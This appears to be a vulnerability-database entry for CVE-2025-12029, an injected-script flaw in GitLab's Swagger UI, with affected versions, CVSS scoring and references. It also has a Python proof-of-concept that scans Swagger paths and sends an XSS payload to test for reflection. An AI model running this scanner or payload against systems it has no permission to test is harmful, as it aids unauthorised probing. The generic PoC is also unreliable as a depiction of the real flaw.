Security Vulnerability Report
CVE-2025-12029 CVSS 8.0 HIGH

CVE-2025-12029

Published: 2025-12-11 08:15:48
Last Modified: 2025-12-23 21:01:57

Description

GitLab has remediated an issue in GitLab CE/EE affecting all versions from 15.11 before 18.4.6, 18.5 before 18.5.4, and 18.6 before 18.6.2 that could have, under certain circumstances, allowed an unauthenticated user to perform unauthorized actions on behalf of another user by injecting malicious external scripts into the Swagger UI.

CVSS Details

CVSS Score: 8.0
Severity: HIGH
CVSS Vector: CVSS:3.1/AV:N/AC:H/PR:N/UI:R/S:C/C:H/I:H/A:N

Configurations (Affected Products)

cpe:2.3:a:gitlab:gitlab:*:*:*:*:community:*:*:* - VULNERABLE (from 15.11.0, before 18.4.6)
cpe:2.3:a:gitlab:gitlab:*:*:*:*:enterprise:*:*:* - VULNERABLE (from 15.11.0, before 18.4.6)
cpe:2.3:a:gitlab:gitlab:*:*:*:*:community:*:*:* - VULNERABLE (from 18.5.0, before 18.5.4)
cpe:2.3:a:gitlab:gitlab:*:*:*:*:enterprise:*:*:* - VULNERABLE (from 18.5.0, before 18.5.4)
cpe:2.3:a:gitlab:gitlab:*:*:*:*:community:*:*:* - VULNERABLE (from 18.6.0, before 18.6.2)
cpe:2.3:a:gitlab:gitlab:*:*:*:*:enterprise:*:*:* - VULNERABLE (from 18.6.0, before 18.6.2)

GitLab CE/EE: all versions from 15.11 before 18.4.6
GitLab CE/EE: all versions from 18.5 before 18.5.4
GitLab CE/EE: all versions from 18.6 before 18.6.2

PoC / Exploit Code

⚠ For Security Research Only
The following code is for security research and authorized testing only.
```python
import requests

# CVE-2025-12029 PoC - GitLab Swagger UI XSS
# Target: GitLab instances with Swagger UI enabled


def check_vulnerability(target_url):
    """Check whether a GitLab instance reflects an injected script via Swagger UI.

    This is a reflection heuristic: it probes the usual Swagger UI paths and
    checks whether a marker payload passed in the ``url`` query parameter
    comes back unescaped in the response body.
    """
    vulnerable_endpoints = [
        "/api-docs",
        "/swagger",
        "/swagger-ui",
        "/api/v4/swagger",
    ]
    # The same marker is sent and searched for, so a match means the
    # response contains the payload verbatim (i.e. unsanitized).
    xss_payload = '<script>alert("XSS CVE-2025-12029")</script>'

    for endpoint in vulnerable_endpoints:
        url = target_url.rstrip("/") + endpoint
        try:
            response = requests.get(url, timeout=10)
            if response.status_code == 200 and "swagger" in response.text.lower():
                print(f"[+] Swagger UI found at: {url}")
                # Send the marker in the `url` parameter; requests handles URL encoding.
                xss_response = requests.get(url, params={"url": xss_payload}, timeout=10)
                if xss_payload in xss_response.text:
                    print(f"[!] VULNERABLE: XSS payload reflected at {xss_response.url}")
                    return True
        except requests.RequestException as e:
            print(f"[-] Error accessing {url}: {e}")
    return False


# Example usage
# target = "https://gitlab.example.com"
# check_vulnerability(target)

# Note: This PoC demonstrates the vulnerability concept.
# Actual exploitation requires specific conditions and user interaction.
```

References

https://about.gitlab.com/releases/2025/12/10/patch-release-gitlab-18-6-2-released/ (Release Notes, Vendor Advisory)
https://gitlab.com/gitlab-org/gitlab/-/issues/577975 (Broken Link)
https://hackerone.com/reports/3317485 (Permissions Required)

Raw JSON Data
